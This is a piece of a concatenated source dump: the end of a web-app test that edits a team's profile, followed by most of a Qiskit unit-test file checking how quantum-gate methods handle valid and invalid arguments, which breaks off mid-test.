, auth_as='picard'
)
assert r.code == 400
assert "Please enter an http[s]:// URL for the 'Homepage' field." in r.body
assert T('enterprise').homepage == 'http://starwars-enterprise.com/'
def test_edit_with_empty_data_does_nothing(self):
team_data = {
'slug': 'enterprise',
'is_approved': True,
'name': 'Enterprise',
'product_or_service': 'We save galaxies.',
'homepage': 'http://starwars-enterprise.com/',
}
self.make_team(**team_data)
r = self.client.POST( '/enterprise/edit/edit.json'
, data={}
, auth_as='picard'
)
assert r.code == 200
team = T('enterprise')
for field in team_data:
assert getattr(team, field) == team_data[field]
|
py | 1a40c428f1dfddac3f04d86c3db15dd82d3b71d4 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=missing-docstring
import unittest
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.qasm import pi
from qiskit.exceptions import QiskitError
from qiskit.test import QiskitTestCase
class TestStandard1Q(QiskitTestCase):
"""Standard Extension Test. Gates with a single Qubit"""
def setUp(self):
self.qr = QuantumRegister(3, "q")
self.qr2 = QuantumRegister(3, "r")
self.cr = ClassicalRegister(3, "c")
self.circuit = QuantumCircuit(self.qr, self.qr2, self.cr)
def test_barrier(self):
self.circuit.barrier(self.qr[1])
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[1]])
def test_barrier_wires(self):
self.circuit.barrier(1)
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[1]])
def test_barrier_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.barrier, self.cr[0])
self.assertRaises(QiskitError, qc.barrier, self.cr)
self.assertRaises(QiskitError, qc.barrier, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.barrier, .0)
def test_conditional_barrier_invalid(self):
qc = self.circuit
barrier = qc.barrier(self.qr)
self.assertRaises(QiskitError, barrier.c_if, self.cr, 0)
def test_barrier_reg(self):
self.circuit.barrier(self.qr)
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_barrier_none(self):
self.circuit.barrier()
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2],
self.qr2[0], self.qr2[1], self.qr2[2]])
def test_ccx(self):
self.circuit.ccx(self.qr[0], self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ccx')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_ccx_wires(self):
self.circuit.ccx(0, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ccx')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_ccx_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.ccx, self.cr[0], self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.ccx, self.qr[0], self.qr[0], self.qr[2])
self.assertRaises(QiskitError, qc.ccx, 0.0, self.qr[0], self.qr[2])
self.assertRaises(QiskitError, qc.ccx, self.cr, self.qr, self.qr)
self.assertRaises(QiskitError, qc.ccx, 'a', self.qr[1], self.qr[2])
def test_ch(self):
self.circuit.ch(self.qr[0], self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ch')
self.assertEqual(qargs, [self.qr[0], self.qr[1]])
def test_ch_wires(self):
self.circuit.ch(0, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ch')
self.assertEqual(qargs, [self.qr[0], self.qr[1]])
def test_ch_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.ch, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.ch, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.ch, .0, self.qr[0])
self.assertRaises(QiskitError, qc.ch, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.ch, self.cr, self.qr)
self.assertRaises(QiskitError, qc.ch, 'a', self.qr[1])
def test_crz(self):
self.circuit.crz(1, self.qr[0], self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'crz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[0], self.qr[1]])
def test_crz_wires(self):
self.circuit.crz(1, 0, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'crz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[0], self.qr[1]])
def test_crz_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.crz, 0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.crz, 0, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.crz, 0, .0, self.qr[0])
self.assertRaises(QiskitError, qc.crz, self.qr[2], self.qr[1], self.qr[0])
self.assertRaises(QiskitError, qc.crz, 0, self.qr[1], self.cr[2])
self.assertRaises(QiskitError, qc.crz, 0, (self.qr, 3), self.qr[1])
self.assertRaises(QiskitError, qc.crz, 0, self.cr, self.qr)
# TODO self.assertRaises(QiskitError, qc.crz, 'a', self.qr[1], self.qr[2])
def test_cswap(self):
self.circuit.cswap(self.qr[0], self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cswap')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_cswap_wires(self):
self.circuit.cswap(0, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cswap')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2]])
def test_cswap_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cswap, self.cr[0], self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cswap, self.qr[1], self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cswap, self.qr[1], .0, self.qr[0])
self.assertRaises(QiskitError, qc.cswap, self.cr[0], self.cr[1], self.qr[0])
self.assertRaises(QiskitError, qc.cswap, self.qr[0], self.qr[0], self.qr[1])
self.assertRaises(QiskitError, qc.cswap, .0, self.qr[0], self.qr[1])
self.assertRaises(QiskitError, qc.cswap, (self.qr, 3), self.qr[0], self.qr[1])
self.assertRaises(QiskitError, qc.cswap, self.cr, self.qr[0], self.qr[1])
self.assertRaises(QiskitError, qc.cswap, 'a', self.qr[1], self.qr[2])
def test_cu1(self):
self.circuit.cu1(1, self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cu1')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cu1_wires(self):
self.circuit.cu1(1, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cu1')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cu1_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cu1, self.cr[0], self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cu1, 1, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cu1, self.qr[1], 0, self.qr[0])
self.assertRaises(QiskitError, qc.cu1, 0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.cu1, 0, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cu1, 0, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cu1, self.qr[2], self.qr[1], self.qr[0])
self.assertRaises(QiskitError, qc.cu1, 0, self.qr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cu1, 0, (self.qr, 3), self.qr[1])
self.assertRaises(QiskitError, qc.cu1, 0, self.cr, self.qr)
# TODO self.assertRaises(QiskitError, qc.cu1, 'a', self.qr[1], self.qr[2])
def test_cu3(self):
self.circuit.cu3(1, 2, 3, self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cu3')
self.assertEqual(op.params, [1, 2, 3])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cu3_wires(self):
self.circuit.cu3(1, 2, 3, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cu3')
self.assertEqual(op.params, [1, 2, 3])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cu3_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cu3, 0, 0, self.qr[0], self.qr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cu3, 0, 0, self.qr[1], 0, self.qr[0])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, (self.qr, 3), self.qr[1])
self.assertRaises(QiskitError, qc.cu3, 0, 0, 0, self.cr, self.qr)
# TODO self.assertRaises(QiskitError, qc.cu3, 0, 0, 'a', self.qr[1], self.qr[2])
def test_cx(self):
self.circuit.cx(self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cx')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cx_wires(self):
self.circuit.cx(1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cx')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cx_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cx, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cx, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cx, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cx, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.cx, self.cr, self.qr)
self.assertRaises(QiskitError, qc.cx, 'a', self.qr[1])
def test_cy(self):
self.circuit.cy(self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cy')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cy_wires(self):
self.circuit.cy(1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cy')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cy_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cy, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cy, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cy, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cy, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.cy, self.cr, self.qr)
self.assertRaises(QiskitError, qc.cy, 'a', self.qr[1])
def test_cz(self):
self.circuit.cz(self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cz')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cz_wires(self):
self.circuit.cz(1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'cz')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_cz_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.cz, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.cz, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.cz, .0, self.qr[0])
self.assertRaises(QiskitError, qc.cz, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.cz, self.cr, self.qr)
self.assertRaises(QiskitError, qc.cz, 'a', self.qr[1])
def test_h(self):
self.circuit.h(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'h')
self.assertEqual(qargs, [self.qr[1]])
def test_h_wires(self):
self.circuit.h(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'h')
self.assertEqual(qargs, [self.qr[1]])
def test_h_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.h, self.cr[0])
self.assertRaises(QiskitError, qc.h, self.cr)
self.assertRaises(QiskitError, qc.h, (self.qr, 3))
self.assertRaises(QiskitError, qc.h, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.h, .0)
def test_h_reg(self):
instruction_set = self.circuit.h(self.qr)
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'h')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
def test_h_reg_inv(self):
instruction_set = self.circuit.h(self.qr).inverse()
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'h')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
def test_iden(self):
self.circuit.iden(self.qr[1])
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'id')
self.assertEqual(op.params, [])
def test_iden_wires(self):
self.circuit.iden(1)
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'id')
self.assertEqual(op.params, [])
def test_iden_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.iden, self.cr[0])
self.assertRaises(QiskitError, qc.iden, self.cr)
self.assertRaises(QiskitError, qc.iden, (self.qr, 3))
self.assertRaises(QiskitError, qc.iden, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.iden, .0)
def test_iden_reg(self):
instruction_set = self.circuit.iden(self.qr)
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'id')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
def test_iden_reg_inv(self):
instruction_set = self.circuit.iden(self.qr).inverse()
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'id')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
def test_rx(self):
self.circuit.rx(1, self.qr[1])
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'rx')
self.assertEqual(op.params, [1])
def test_rx_wires(self):
self.circuit.rx(1, 1)
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'rx')
self.assertEqual(op.params, [1])
def test_rx_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.rx, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.rx, self.qr[1], 0)
self.assertRaises(QiskitError, qc.rx, 0, self.cr[0])
self.assertRaises(QiskitError, qc.rx, 0, .0)
self.assertRaises(QiskitError, qc.rx, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.rx, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.rx, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.rx, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.rx, 0, 'a')
def test_rx_reg(self):
instruction_set = self.circuit.rx(1, self.qr)
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'rx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_rx_reg_inv(self):
instruction_set = self.circuit.rx(1, self.qr).inverse()
self.assertEqual(len(instruction_set.instructions), 3)
self.assertEqual(instruction_set.instructions[0].name, 'rx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_rx_pi(self):
qc = self.circuit
qc.rx(pi / 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rx')
self.assertEqual(op.params, [pi / 2])
self.assertEqual(qargs, [self.qr[1]])
def test_ry(self):
self.circuit.ry(1, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ry')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_ry_wires(self):
self.circuit.ry(1, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'ry')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_ry_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.ry, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.ry, self.qr[1], 0)
self.assertRaises(QiskitError, qc.ry, 0, self.cr[0])
self.assertRaises(QiskitError, qc.ry, 0, .0)
self.assertRaises(QiskitError, qc.ry, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.ry, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.ry, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.ry, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.ry, 0, 'a')
def test_ry_reg(self):
instruction_set = self.circuit.ry(1, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'ry')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_ry_reg_inv(self):
instruction_set = self.circuit.ry(1, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'ry')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_ry_pi(self):
qc = self.circuit
qc.ry(pi / 2, self.qr[1])
op, _, _ = self.circuit[0]
self.assertEqual(op.name, 'ry')
self.assertEqual(op.params, [pi / 2])
def test_rz(self):
self.circuit.rz(1, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_rz_wires(self):
self.circuit.rz(1, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_rz_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.rz, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.rz, self.qr[1], 0)
self.assertRaises(QiskitError, qc.rz, 0, self.cr[0])
self.assertRaises(QiskitError, qc.rz, 0, .0)
self.assertRaises(QiskitError, qc.rz, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.rz, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.rz, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.rz, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.rz, 0, 'a')
def test_rz_reg(self):
instruction_set = self.circuit.rz(1, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'rz')
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_rz_reg_inv(self):
instruction_set = self.circuit.rz(1, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'rz')
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_rz_pi(self):
self.circuit.rz(pi / 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rz')
self.assertEqual(op.params, [pi / 2])
self.assertEqual(qargs, [self.qr[1]])
def test_rzz(self):
self.circuit.rzz(1, self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rzz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_rzz_wires(self):
self.circuit.rzz(1, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rzz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_rzz_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.rzz, 1, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.rzz, 1, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.rzz, 1, .0, self.qr[0])
self.assertRaises(QiskitError, qc.rzz, 1, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.rzz, 1, self.cr, self.qr)
self.assertRaises(QiskitError, qc.rzz, 1, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.rzz, 0.1, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.rzz, 0.1, self.qr[0], self.qr[0])
def test_s(self):
self.circuit.s(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 's')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_s_wires(self):
self.circuit.s(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 's')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_s_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.s, self.cr[0])
self.assertRaises(QiskitError, qc.s, self.cr)
self.assertRaises(QiskitError, qc.s, (self.qr, 3))
self.assertRaises(QiskitError, qc.s, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.s, .0)
def test_s_reg(self):
instruction_set = self.circuit.s(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 's')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_s_reg_inv(self):
instruction_set = self.circuit.s(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'sdg')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_sdg(self):
self.circuit.sdg(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'sdg')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_sdg_wires(self):
self.circuit.sdg(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'sdg')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_sdg_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.sdg, self.cr[0])
self.assertRaises(QiskitError, qc.sdg, self.cr)
self.assertRaises(QiskitError, qc.sdg, (self.qr, 3))
self.assertRaises(QiskitError, qc.sdg, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.sdg, .0)
def test_sdg_reg(self):
instruction_set = self.circuit.sdg(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'sdg')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_sdg_reg_inv(self):
instruction_set = self.circuit.sdg(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 's')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_swap(self):
self.circuit.swap(self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'swap')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_swap_wires(self):
self.circuit.swap(1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'swap')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_swap_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.swap, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.swap, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.swap, .0, self.qr[0])
self.assertRaises(QiskitError, qc.swap, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.swap, self.cr, self.qr)
self.assertRaises(QiskitError, qc.swap, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.swap, self.qr, self.qr2[[1, 2]])
self.assertRaises(QiskitError, qc.swap, self.qr[:2], self.qr2)
def test_t(self):
self.circuit.t(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 't')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_t_wire(self):
self.circuit.t(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 't')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_t_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.t, self.cr[0])
self.assertRaises(QiskitError, qc.t, self.cr)
self.assertRaises(QiskitError, qc.t, (self.qr, 3))
self.assertRaises(QiskitError, qc.t, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.t, .0)
def test_t_reg(self):
instruction_set = self.circuit.t(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 't')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_t_reg_inv(self):
instruction_set = self.circuit.t(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'tdg')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_tdg(self):
self.circuit.tdg(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'tdg')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_tdg_wires(self):
self.circuit.tdg(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'tdg')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_tdg_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.tdg, self.cr[0])
self.assertRaises(QiskitError, qc.tdg, self.cr)
self.assertRaises(QiskitError, qc.tdg, (self.qr, 3))
self.assertRaises(QiskitError, qc.tdg, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.tdg, .0)
def test_tdg_reg(self):
instruction_set = self.circuit.tdg(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'tdg')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_tdg_reg_inv(self):
instruction_set = self.circuit.tdg(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 't')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_u0(self):
self.circuit.u0(1, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u0')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_u0_wires(self):
self.circuit.u0(1, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u0')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_u0_invalid(self):
qc = self.circuit
# CHECKME? self.assertRaises(QiskitError, qc.u0, self.cr[0], self.qr[0])
self.assertRaises(QiskitError, qc.u0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.u0, self.qr[1], 0)
self.assertRaises(QiskitError, qc.u0, 0, self.cr[0])
self.assertRaises(QiskitError, qc.u0, 0, .0)
self.assertRaises(QiskitError, qc.u0, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.u0, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.u0, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.u0, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.u0, 0, 'a')
def test_u0_reg(self):
instruction_set = self.circuit.u0(1, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'u0')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_u0_reg_inv(self):
instruction_set = self.circuit.u0(1, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'u0')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_u0_pi(self):
qc = self.circuit
qc.u0(pi / 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u0')
self.assertEqual(op.params, [pi / 2])
self.assertEqual(qargs, [self.qr[1]])
def test_u1(self):
self.circuit.u1(1, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u1')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_u1_wires(self):
self.circuit.u1(1, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u1')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_u1_invalid(self):
qc = self.circuit
# CHECKME? self.assertRaises(QiskitError, qc.u1, self.cr[0], self.qr[0])
self.assertRaises(QiskitError, qc.u1, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.u1, self.qr[1], 0)
self.assertRaises(QiskitError, qc.u1, 0, self.cr[0])
self.assertRaises(QiskitError, qc.u1, 0, .0)
self.assertRaises(QiskitError, qc.u1, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.u1, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.u1, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.u1, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.u1, 0, 'a')
def test_u1_reg(self):
instruction_set = self.circuit.u1(1, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'u1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_u1_reg_inv(self):
instruction_set = self.circuit.u1(1, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'u1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_u1_pi(self):
qc = self.circuit
qc.u1(pi / 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u1')
self.assertEqual(op.params, [pi / 2])
self.assertEqual(qargs, [self.qr[1]])
def test_u2(self):
self.circuit.u2(1, 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u2')
self.assertEqual(op.params, [1, 2])
